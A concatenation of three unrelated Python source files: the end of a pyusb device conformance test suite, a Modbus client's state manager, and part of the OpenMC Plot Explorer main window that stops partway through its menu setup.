log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
if verbose:
log('Testing endpoint halt at a random point of bulk transmission.')
end_ts = time.time() + 1.0
while time.time() < end_ts:
halt_ep_test(dev, bulk_out, bulk_in, log)
request_endpoint_loops_restart(dev)
if verbose:
log('Testing endpoint halt at a random point of interrupt transmission.')
end_ts = time.time() + 1.0
while time.time() < end_ts:
halt_ep_test(dev, interrupt_out, interrupt_in, log)
request_endpoint_loops_restart(dev)
def ep_test_parallel_transfers(dev, log, verbose=False):
"""Test simultaneous data transfers for multiple OUT/IN endpoint pairs.
Given a USB device with multiple OUT/IN endpoint pairs
When multiple OUT and IN endpoints are used to transfer random test data
Then all transfers succeed
and data received equals data sent for every endpoint pair
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing simultaneous transfers through bulk and interrupt endpoint pairs.')
test_error = Event()
test_failure = Event()
test_kwargs_bulk_ep = {
'ep_out': bulk_out,
'ep_in': bulk_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
test_kwargs_interrupt_ep = {
'ep_out': interrupt_out,
'ep_in': interrupt_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
ep_test_threads = []
for kwargs in (test_kwargs_bulk_ep, test_kwargs_interrupt_ep):
ep_test_threads.append(Thread(target=random_size_loopback_ep_test, kwargs=kwargs))
for t in ep_test_threads:
t.start()
for t in ep_test_threads:
t.join()
if test_failure.is_set():
raise_unconditionally(lineno(), 'Payload mismatch')
if test_error.is_set():
raise_unconditionally(lineno(), 'USBError')
def ep_test_parallel_transfers_ctrl(dev, log, verbose=False):
"""Test simultaneous data transfers in parallel with control transfers.
Given a USB device with multiple OUT/IN endpoint pairs
When multiple OUT and IN endpoints are used to transfer random data
and control requests are processed in parallel
Then all transfers succeed
and for every endpoint pair, data received by host equals data sent by host
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing parallel data transfers through bulk, interrupt & control endpoint pairs.')
test_error = Event()
test_failure = Event()
test_kwargs_bulk_ep = {
'ep_out': bulk_out,
'ep_in': bulk_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
test_kwargs_interrupt_ep = {
'ep_out': interrupt_out,
'ep_in': interrupt_in,
'failure': test_failure,
'error': test_error,
'seconds': 1.0,
'log': log}
ep_test_threads = []
for kwargs in (test_kwargs_bulk_ep, test_kwargs_interrupt_ep):
ep_test_threads.append(Thread(target=random_size_loopback_ep_test, kwargs=kwargs))
for t in ep_test_threads:
t.start()
while any(t.is_alive() for t in ep_test_threads):
control_stress_test(dev, log)
control_sizes_test(dev, log)
for t in ep_test_threads:
t.join()
if test_failure.is_set():
raise_unconditionally(lineno(), 'Payload mismatch')
if test_error.is_set():
raise_unconditionally(lineno(), 'USBError')
def ep_test_abort(dev, log, verbose=False):
"""Test aborting data transfer for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When a device aborts an in progress data transfer
Then no more data is transmitted
and endpoint buffer is correctly released on the device end
"""
NUM_PACKETS_UNTIL_ABORT = 2
NUM_PACKETS_AFTER_ABORT = 8
# If the host ever receives a payload with any byte set to this value,
# the device does not handle abort operation correctly. The buffer
# passed to aborted operation must not be used after call to abort().
FORBIDDEN_PAYLOAD_VALUE = NUM_PACKETS_AFTER_ABORT + 1
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
if verbose:
log('Testing aborting an in progress transfer for IN endpoints.')
for ep_in in (bulk_in, interrupt_in):
payload_size = (NUM_PACKETS_UNTIL_ABORT + NUM_PACKETS_AFTER_ABORT) * ep_in.wMaxPacketSize
payload_in = array.array('B')
while len(payload_in) < payload_size:
try:
packet = ep_in.read(ep_in.wMaxPacketSize)
payload_in.extend(packet)
except usb.core.USBError as err:
break
if FORBIDDEN_PAYLOAD_VALUE in payload_in:
raise_unconditionally(
lineno(), 'Endpoint buffer not released when aborting the '
'write operation on endpoint {0.bEndpointAddress:#04x}.'
.format(ep_in))
if verbose:
log('The size of data successfully received from endpoint {0.bEndpointAddress:#04x}: {1} B.'
.format(ep_in, len(payload_in)))
too_little = bool(len(payload_in) < (NUM_PACKETS_UNTIL_ABORT * ep_in.wMaxPacketSize))
too_much = bool(len(payload_in) >= payload_size)
if too_little or too_much:
raise_unconditionally(
lineno(), 'Invalid size of data successfully received from endpoint '
'{0.bEndpointAddress:#04x} before aborting the transfer. '
'Value {1} B out of range [{2}, {3}).'
.format(ep_in, len(payload_in),
NUM_PACKETS_UNTIL_ABORT * ep_in.wMaxPacketSize, payload_size))
if verbose:
log('Testing aborting an in progress transfer for OUT endpoints.')
for ep_out in (bulk_out, interrupt_out):
payload_size = (NUM_PACKETS_UNTIL_ABORT + NUM_PACKETS_AFTER_ABORT) * ep_out.wMaxPacketSize
num_bytes_written = 0
while num_bytes_written < payload_size:
payload_out = array.array('B', (num_bytes_written//ep_out.wMaxPacketSize
for _ in range(ep_out.wMaxPacketSize)))
try:
num_bytes_written += ep_out.write(payload_out)
except usb.core.USBError:
break
try:
ep_buff_correct = request_abort_buff_check(dev, ep_out)
except (usb.core.USBError, IndexError, TypeError) as err:
raise_unconditionally(
lineno(), 'Unable to verify endpoint buffer content ({!r}).'.format(err))
if not ep_buff_correct:
raise_unconditionally(
lineno(), 'Endpoint buffer not released when aborting the '
'read operation on endpoint {0.bEndpointAddress:#04x}.'
.format(ep_out))
if verbose:
log('The size of data successfully sent to endpoint {0.bEndpointAddress:#04x}: {1} B.'
.format(ep_out, num_bytes_written))
too_little = bool(num_bytes_written < (NUM_PACKETS_UNTIL_ABORT * ep_out.wMaxPacketSize))
too_much = bool(num_bytes_written >= payload_size)
if too_little or too_much:
raise_unconditionally(
lineno(), 'Invalid size of data successfully sent to endpoint '
'{0.bEndpointAddress:#04x} before aborting the transfer. '
'Value {1} B out of range [{2}, {3}).'
.format(ep_out, num_bytes_written,
NUM_PACKETS_UNTIL_ABORT * ep_out.wMaxPacketSize, payload_size))
def ep_test_data_toggle(dev, log, verbose=False):
"""Test data toggle reset for bulk OUT/IN endpoint pairs.
Given a USB device
When an interface is set
Then the data toggle bits for all endpoints are reset to DATA0
When clear feature is called for an endpoint that *IS NOT* stalled
Then the data toggle is reset to DATA0 for that endpoint
When clear halt is called for an endpoint that *IS* stalled
Then the data toggle is reset to DATA0 for that endpoint
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
if verbose:
log('Testing data toggle reset for bulk endpoint pair.')
# 1.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 1.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 1.3 reset OUT and IN data toggle to DATA0
# USB spec, section 9.1.1.5
# "
# Configuring a device or changing an alternate setting causes all of the status and
# configuration values associated with endpoints in the affected interfaces to be set to their default values.
# This includes setting the data toggle of any endpoint using data toggles to the value DATA0.
# "
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 1.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when setting interface.')
# 2.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 2.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 2.3 reset OUT data toggle to DATA0
# USB spec, section 9.4.5
# "
# For endpoints using data toggle, regardless of whether an endpoint has the Halt feature set, a
# ClearFeature(ENDPOINT_HALT) request always results in the data toggle being reinitialized to DATA0.
# "
bulk_out.clear_halt()
# The ClearFeature(ENDPOINT_HALT) terminates a pending read operation on the device end.
# Use a custom vendor request to restart reading on the OUT endpoint.
# This does not impact the state of the data toggle bit.
request_endpoint_loops_restart(dev)
# 2.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when calling ClearFeature(ENDPOINT_HALT) '
'on an endpoint that has not been halted.')
# 3.1 reset OUT and IN data toggle to DATA0
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
# 3.2 send and receive a single data packet,
# so both OUT and IN endpoints switch to DATA1
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
# 3.3 reset IN data toggle to DATA0
# USB spec, section 9.4.5
# "
# For endpoints using data toggle, regardless of whether an endpoint has the Halt feature set, a
# ClearFeature(ENDPOINT_HALT) request always results in the data toggle being reinitialized to DATA0.
# "
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, bulk_in)
bulk_in.clear_halt()
# 3.4 verify that host and USB device are still in sync with respect to data toggle
try:
loopback_ep_test(bulk_out, bulk_in, bulk_out.wMaxPacketSize)
except usb.USBError as err:
if verbose:
log(USB_ERROR_FMT.format(err, bulk_out, bulk_in, bulk_out.wMaxPacketSize))
raise_unconditionally(lineno(), 'Data toggle not reset when clearing endpoint halt.')
def device_reset_test(log):
"""
Test USB implementation against repeated reset
Given an initialized USB (HOST <---> DUT connection established)
When USB device is reset repeatedly
Then the USB is operational with no errors
"""
dev = yield
dev.reset();
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
dev.reset();
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
dev.reset();
dev = yield
# run other test to check if USB works fine after reset
control_data_test(dev, [64, 256], log)
yield
def device_soft_reconnection_test(log):
"""
Test USB implementation against repeated reconnection
Given an initialized USB (HOST <---> DUT connection established)
When USB device is disconnected and then connected repeatedly
Then the USB is operational with no errors
"""
list = [64, 256]
dev = yield
# run other test to check if USB works fine before reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after reconnection
control_data_test(dev, list, log)
yield
def device_suspend_resume_test(log):
"""
Test USB implementation against repeated suspend and resume
Given an initialized USB (HOST <---> DUT connection established)
When USB device is suspended and then resumed repeatedly
Then the USB is operational with no errors
"""
dev = yield
control_data_test(dev, [64, 256], log)
# suspend code goes here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
# suspend code here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
# suspend code here
# ...
# resume code here
# ...
# run other test to check if USB works fine after resume
control_data_test(dev, [64, 256], log)
yield
def repeated_construction_destruction_test(log):
"""
Test USB implementation against repeated initialization and deinitialization
Given an initialized USB (HOST <---> DUT connection established)
When USB device is deinitialized and then initialized repeatedly
Then the USB is operational with no errors
"""
list = [64, 256]
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
dev = yield
# run other test to check if USB works fine after repeated construction/destruction
control_data_test(dev, list, log)
yield
def release_interfaces(dev):
""" Releases interfaces to allow configuration switch
Fixes error while configuration change(on Windows machines):
USBError: [Errno None] libusb0-dll:err [set_configuration] can't change configuration, an interface is still in use (claimed)
"""
cfg = dev.get_active_configuration()
for i in range(0, cfg.bNumInterfaces):
usb.util.release_interface(dev, i)
def restore_default_configuration(dev):
""" Set default configuration """
cfg = dev[1]
cfg.set()
def get_status(dev, recipient, index = 0):
""" Get status of the recipient
Args:
dev - pyusb device
recipient - CTRL_RECIPIENT_DEVICE/CTRL_RECIPIENT_INTERFACE/CTRL_RECIPIENT_ENDPOINT
index - 0 if recipient is device, interface index if recipient is interface, endpoint index if recipient is endpoint
Returns:
status flag 32b int
"""
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
recipient)
request = REQUEST_GET_STATUS
value = 0 # Always 0 for this request
index = index # recipient index
length = 2 # Always 2 for this request (size of return data)
ret = dev.ctrl_transfer(request_type, request, value, index, length)
ret = ret[0] | (ret[1] << 8)
return ret
def get_descriptor(dev, type_index, lang_id, length):
# Control IN GET_DESCRIPTOR - device
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = REQUEST_GET_DESCRIPTOR
value = type_index # Descriptor Type (H) and Descriptor Index (L)
index = lang_id # 0 or Language ID for this request
length = length # Descriptor Length
ret = dev.ctrl_transfer(request_type, request, value, index, length)
return ret
|
state_manager.py
|
import asyncio
from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from queue import Queue
from threading import Thread
from PySide2.QtCore import QObject, Signal
from modbus_client.communication.connection import Connection
from modbus_client.db.backend import Backend
from modbus_client.resources.codes import Codes
class StateManager(QObject):
"""
Used for communication between GUI and Connection module while monitoring and storing current state of the device
that it's connected to.
"""
update = Signal(dict)
update_counter = Signal(int)
initiate_live_view_update = Signal()
update_view = Signal(dict)
update_historian = Signal(dict)
export_response = Signal(list)
export_request = Signal(list)
def __init__(self, refresh_time=3):
super(StateManager, self).__init__()
self._refresh_time = refresh_time
self.user_req_queue = Queue()
self.backend = Backend()
self._executor = ThreadPoolExecutor(max_workers=1)
self.current_state = dict()
self._connection = Connection()
self._connected = False
self._pause_refresh = False
self._pause_future = asyncio.Future()
self._pause_future.set_result(True)
def run_loop(self):
"""
Initiates the loop thread of the state manager.
"""
loop_thread = Thread(
target=lambda: asyncio.new_event_loop().run_until_complete(self._write_loop()), daemon=True)
loop_thread.start()
async def _write_loop(self):
while True:
message = await asyncio.get_event_loop().run_in_executor(self._executor, self._ext_get_message)
if type(message) == str:
if message == 'CONN':
try:
connection_response = await self._connection.connect()
self.update.emit(connection_response)
if connection_response == 'ACK':
self.counter_future = asyncio.ensure_future(self._counter())
self._connected = True
except Exception:
self.update.emit('wstunnel_error')
elif message == 'DC':
if self._connected:
await self._connection.close()
self.counter_future.cancel()
await self.counter_future
self.update_counter.emit(0)
self._connected = False
elif message == 'close':
if self._connected:
await self._connection.close()
self.counter_future.cancel()
await self.counter_future
await self.backend.close()
return
elif message == 'update_historian':
self.update_historian.emit({'request_history': await self.backend.get_request_history(),
'response_history': await self.backend.get_response_history()})
elif message == 'export_request':
self.export_request.emit(await self.backend.get_request_history())
elif message == 'export_response':
self.export_response.emit(await self.backend.get_response_history())
elif message == 'pause_refresh':
if not self._pause_future.done():
self._pause_future.set_result(True)
else:
self._pause_future = asyncio.Future()
self._pause_refresh = not self._pause_refresh
self.update_counter.emit(0)
elif type(message) == int:
self._refresh_time = message
else:
if message['function_code'] == Codes.READ_COILS.value:
response = await self._connection.read_coils(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_DISCRETE_INPUTS.value:
response = await self._connection.read_discrete_inputs(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_HOLDING_REGISTERS.value:
response = await self._connection.read_holding_registers(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.READ_INPUT_REGISTERS.value:
response = await self._connection.read_input_registers(message['unit_address'],
message['address'], message['count'])
elif message['function_code'] == Codes.WRITE_SINGLE_COIL.value:
response = await self._connection.write_single_coil(message['unit_address'],
message['address'], message['status'])
elif message['function_code'] == Codes.WRITE_SINGLE_REGISTER.value:
response = await self._connection.write_single_register(message['unit_address'],
message['address'], message['data'])
elif message['function_code'] == Codes.WRITE_MULTIPLE_COILS.value:
response = await self._connection.write_multiple_coils(message['unit_address'],
message['address'], message['data'])
elif message['function_code'] == Codes.WRITE_MULTIPLE_REGISTERS.value:
response = await self._connection.write_multiple_registers(message['unit_address'],
message['address'], message['data'])
if message['user_generated']:
try:
await self.backend.insert_request_history(response['transaction_id'], response['unit_address'],
response['function_code'], response['raw_request'])
await self.backend.insert_response_history(response['transaction_id'], response['unit_address'],
response['function_code'], response['raw_data'])
self.update_historian.emit({'request_history': await self.backend.get_request_history(),
'response_history': await self.backend.get_response_history()})
except Exception as e:
print(e)
self.update.emit(response)
else:
self.update_view.emit(response)
async def _counter(self):
with suppress(asyncio.CancelledError):
while True:
await self._pause_future
self.initiate_live_view_update.emit()
for i in range(1, 101):
await asyncio.sleep(self._refresh_time / 100)
if not self._pause_future.done():
break
self.update_counter.emit(i)
def _ext_get_message(self):
return self.user_req_queue.get()
|
main_window.py
|
import copy
from functools import partial
import os
import pickle
from threading import Thread
from PySide2 import QtCore, QtGui
from PySide2.QtGui import QKeyEvent
from PySide2.QtWidgets import (QApplication, QLabel, QSizePolicy, QMainWindow,
QScrollArea, QMessageBox, QAction, QFileDialog,
QColorDialog, QInputDialog, QWidget,
QGestureEvent)
import openmc
import openmc.lib
try:
import vtk
_HAVE_VTK = True
except ImportError:
_HAVE_VTK = False
from .plotmodel import PlotModel, DomainTableModel
from .plotgui import PlotImage, ColorDialog
from .docks import DomainDock, TallyDock
from .overlays import ShortcutsOverlay
from .tools import ExportDataDialog
_COORD_LEVELS = 0
def _openmcReload():
# reset OpenMC memory, instances
openmc.lib.reset()
openmc.lib.finalize()
# initialize geometry (for volume calculation)
openmc.lib.settings.output_summary = False
openmc.lib.init(["-c"])
class MainWindow(QMainWindow):
def __init__(self, font=QtGui.QFontMetrics(QtGui.QFont()), screen_size=QtCore.QSize()):
super().__init__()
self.screen = screen_size
self.font_metric = font
self.setWindowTitle('OpenMC Plot Explorer')
def loadGui(self):
self.pixmap = None
self.zoom = 100
self.loadModel()
# Create viewing area
self.frame = QScrollArea(self)
cw = QWidget()
self.frame.setCornerWidget(cw)
self.frame.setAlignment(QtCore.Qt.AlignCenter)
self.frame.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(self.frame)
# connect pinch gesture (OSX)
self.grabGesture(QtCore.Qt.PinchGesture)
# Create plot image
self.plotIm = PlotImage(self.model, self.frame, self)
self.frame.setWidget(self.plotIm)
# Dock
self.dock = DomainDock(self.model, self.font_metric, self)
self.dock.setObjectName("Domain Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock)
# Tally Dock
self.tallyDock = TallyDock(self.model, self.font_metric, self)
self.tallyDock.update()
self.tallyDock.setObjectName("Tally Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tallyDock)
# Color DialogtallyDock
self.colorDialog = ColorDialog(self.model, self.font_metric, self)
self.colorDialog.hide()
# Tools
self.exportDataDialog = ExportDataDialog(self.model, self.font_metric, self)
# Restore Window Settings
self.restoreWindowSettings()
# Create menubar
self.createMenuBar()
self.updateEditMenu()
# Status Bar
self.coord_label = QLabel()
self.statusBar().addPermanentWidget(self.coord_label)
self.coord_label.hide()
# Keyboard overlay
self.shortcutOverlay = ShortcutsOverlay(self)
self.shortcutOverlay.hide()
# Load Plot
self.statusBar().showMessage('Generating Plot...')
self.dock.updateDock()
self.tallyDock.update()
self.colorDialog.updateDialogValues()
self.statusBar().showMessage('')
# Timer allows GUI to render before plot finishes loading
QtCore.QTimer.singleShot(0, self.plotIm.generatePixmap)
QtCore.QTimer.singleShot(0, self.showCurrentView)
def event(self, event):
# use pinch event to update zoom
if isinstance(event, QGestureEvent):
pinch = event.gesture(QtCore.Qt.PinchGesture)
self.editZoom(self.zoom * pinch.scaleFactor())
if isinstance(event, QKeyEvent) and hasattr(self, "shortcutOverlay"):
self.shortcutOverlay.event(event)
return super().event(event)
def show(self):
super().show()
self.plotIm._resize()
def toggleShortcuts(self):
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.close()
else:
self.shortcutOverlay.move(0, 0)
self.shortcutOverlay.resize(self.width(), self.height())
self.shortcutOverlay.show()
# Create and update menus:
def createMenuBar(self):
self.mainMenu = self.menuBar()
# File Menu
self.reloadModelAction = QAction("&Reload model...", self)
self.reloadModelAction.setShortcut("Ctrl+Shift+R")
self.reloadModelAction.setToolTip("Reload current model")
self.reloadModelAction.setStatusTip("Reload current model")
reload_connector = partial(self.loadModel, reload=True)
self.reloadModelAction.triggered.connect(reload_connector)
self.saveImageAction = QAction("&Save Image As...", self)
self.saveImageAction.setShortcut("Ctrl+Shift+S")
self.saveImageAction.setToolTip('Save plot image')
self.saveImageAction.setStatusTip('Save plot image')
self.saveImageAction.triggered.connect(self.saveImage)
self.saveViewAction = QAction("Save &View...", self)
self.saveViewAction.setShortcut(QtGui.QKeySequence.Save)
self.saveViewAction.setStatusTip('Save current view settings')
self.saveViewAction.triggered.connect(self.saveView)
self.openAction = QAction("&Open View...", self)
self.openAction.setShortcut(QtGui.QKeySequence.Open)
self.openAction.setToolTip('Open saved view settings')
self.openAction.setStatusTip('Open saved view settings')
self.openAction.triggered.connect(self.openView)
self.quitAction = QAction("&Quit", self)
self.quitAction.setShortcut(QtGui.QKeySequence.Quit)
self.quitAction.setToolTip('Quit OpenMC Plot Explorer')
self.quitAction.setStatusTip('Quit OpenMC Plot Explorer')
self.quitAction.triggered.connect(self.close)
self.exportDataAction = QAction('E&xport...', self)
self.exportDataAction.setToolTip('Export model and tally data VTK')
self.setStatusTip('Export current model and tally data to VTK')
self.exportDataAction.triggered.connect(self.exportTallyData)
if not _HAVE_VTK:
self.exportDataAction.setEnabled(False)
self.exportDataAction.setToolTip("Disabled: VTK Python module is not installed")
self.fileMenu = self.mainMenu.addMenu('&File')
self.fileMenu.addAction(self.reloadModelAction)
self.fileMenu.addAction(self.saveImageAction)
self.fileMenu.addAction(self.exportDataAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.saveViewAction)
self.fileMenu.addAction(self.openAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAction)
# Data Menu
self.openStatePointAction = QAction("&Open statepoint...", self)
self.openStatePointAction.setToolTip('Open statepoint file')
self.openStatePointAction.triggered.connect(self.openStatePoint)
self.importPropertiesAction = QAction("&Import properties...", self)
self.importPropertiesAction.setToolTip("Import properties")
self.importPropertiesAction.triggered.connect(self.importProperties)
self.dataMenu = self.mainMenu.addMenu('D&ata')
self.dataMenu.addAction(self.openStatePointAction)
self.dataMenu.addAction(self.importPropertiesAction)
self.updateDataMenu()
# Edit Menu
self.applyAction = QAction("&Apply Changes", self)
self.applyAction.setShortcut("Ctrl+Return")
self.applyAction.setToolTip('Generate new view with changes applied')
self.applyAction.setStatusTip('Generate new view with changes applied')
self.applyAction.triggered.connect(self.applyChanges)
self.undoAction = QAction('&Undo', self)
self.undoAction.setShortcut(QtGui.QKeySequence.Undo)
self.undoAction.setToolTip('Undo')
self.undoAction.setStatusTip('Undo last plot view change')
self.undoAction.setDisabled(True)
self.undoAction.triggered.connect(self.undo)
self.redoAction = QAction('&Redo', self)
self.redoAction.setDisabled(True)
self.redoAction.setToolTip('Redo')
self.redoAction.setStatusTip('Redo last plot view change')
self.redoAction.setShortcut(QtGui.QKeySequence.Redo)
self.redoAction.triggered.connect(self.redo)
self.restoreAction = QAction("&Restore Default Plot", self)
self.restoreAction.setShortcut("Ctrl+R")
self.restoreAction.setToolTip('Restore to default plot view')
self.restoreAction.setStatusTip('Restore to default plot view')
self.restoreAction.triggered.connect(self.restoreDefault)
self.editMenu = self.mainMenu.addMenu('&Edit')
self.editMenu.addAction(self.applyAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.undoAction)
self.editMenu.addAction(self.redoAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.restoreAction)
self.editMenu.addSeparator()
self.editMenu.aboutToShow.connect(self.updateEditMenu)
# Edit -> Basis Menu
self.xyAction = QAction('&xy ', self)
self.xyAction.setCheckable(True)
self.xyAction.setShortcut('Alt+X')
self.xyAction.setToolTip('Change to xy basis')
self.xyAction.setStatusTip('Change to xy basis')
xy_connector = partial(self.editBasis, 'xy', apply=True)
self.xyAction.triggered.connect(xy_connector)
self.xzAction = QAction('x&z ', self)
self.xzAction.setCheckable(True)
self.xzAction.setShortcut('Alt+Z')
self.xzAction.setToolTip('Change to xz basis')
self.xzAction.setStatusTip('Change to xz basis')
xz_connector = partial(self.editBasis, 'xz', apply=True)
self.xzAction.triggered.connect(xz_connector)
self.yzAction = QAction('&yz ', self)
self.yzAction.setCheckable(True)
self.yzAction.setShortcut('Alt+Y')
self.yzAction.setToolTip('Change to yz basis')
self.yzAction.setStatusTip('Change to yz basis')
yz_connector = partial(self.editBasis, 'yz', apply=True)
self.yzAction.triggered.connect(yz_connector)
self.basisMenu = self.editMenu.addMenu('&Basis')
self.basisMenu.addAction(self.xyAction)
self.basisMenu.addAction(self.xzAction)
self.basisMenu.addAction(self.yzAction)
self.basisMenu.aboutToShow.connect(self.updateBasisMenu)
# Edit -> Color By Menu
self.cellAction = QAction('&Cell', self)
self.cellAction.setCheckable(True)
self.cellAction.setShortcut('Alt+C')
self.cellAction.setToolTip('Color by cell')
self.cellAction.setStatusTip('Color plot by cell')
cell_connector = partial(self.editColorBy, 'cell', apply=True)
self.cellAction.triggered.connect(cell_connector)
self.materialAction = QAction('&Material', self)
self.materialAction.setCheckable(True)
self.materialAction.setShortcut('Alt+M')
self.materialAction.setToolTip('Color by material')
self.materialAction.setStatusTip('Color plot by material')
material_connector = partial(self.editColorBy, 'material', apply=True)
self.materialAction.triggered.connect(material_connector)
self.temperatureAction = QAction('&Temperature', self)
self.temperatureAction.setCheckable(True)
self.temperatureAction.setShortcut('Alt+T')
self.temperatureAction.setToolTip('Color by temperature')
self.temperatureAction.setStatusTip('Color plot by temperature')
temp_connector = partial(self.editColorBy, 'temperature', apply=True)
self.temperatureAction.triggered.connect(temp_connector)
self.densityAction = QAction('&Density', self)
self.densityAction.setCheckable(True)
self.densityAction.setShortcut('Alt+D')
